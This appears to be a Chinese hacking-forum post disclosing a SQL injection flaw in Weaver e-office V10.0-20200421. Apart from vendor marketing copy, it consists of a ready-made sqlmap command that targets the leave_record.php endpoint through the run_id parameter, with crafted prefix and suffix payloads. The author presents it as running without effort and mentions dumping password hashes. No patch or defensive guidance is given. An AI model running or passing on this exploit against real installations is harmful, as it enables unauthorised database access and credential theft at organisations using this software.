请选择 进入手机版 | 继续访问电脑版
查看: 1845|回复: 0

泛微eoffice10-20200421注入漏洞

[复制链接]
  • TA的每日心情
    擦汗
    7 小时前
  • 签到天数: 1085 天

    [LV.10]以坛为家III

    发表于 2021-8-13 19:06:26 | 显示全部楼层 |阅读模式
    泛微品牌影响力:

    20年 专注OA的研发创新
    OA软件领域 首家 主板上市公司
    协同行业 “国家 重点 软件企业”
    全国 200多个 本地化服务机构
    中国高端移动办公协同OA的专业厂商


      泛微e-office深谙改革之道以迎变革之机,沉心产品研发数十载之久,全新产品e-office10.0正式上线,力求为用户提供更极致、更优质的产品体验。
      e-office10.0无论是在安全性、扩展性还是智能性方面,都进行了一次完美蜕变。在原版本基础上,V10.0主要具有10项优势。
      全新上线的e-office10.0在产品性能上做了进一步提升,无论是在安全性、扩展性还是智能性方面,都进行了一次完美蜕变。

    漏洞存在的版本:
    V10.0-20200421


    注入点位置:
    [PHP] 纯文本查看 复制代码
    python sqlmap.py -u "http://127.0.0.1:8010/eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10" --prefix="') " --suffix="%23" -p run_id


    PS:table_field=*也可以

    放进sqlmap直接跑就可以,无门槛~
    缺陷是跑出来的密文无法解密,蛋疼的很

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有帐号?注册

    x
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表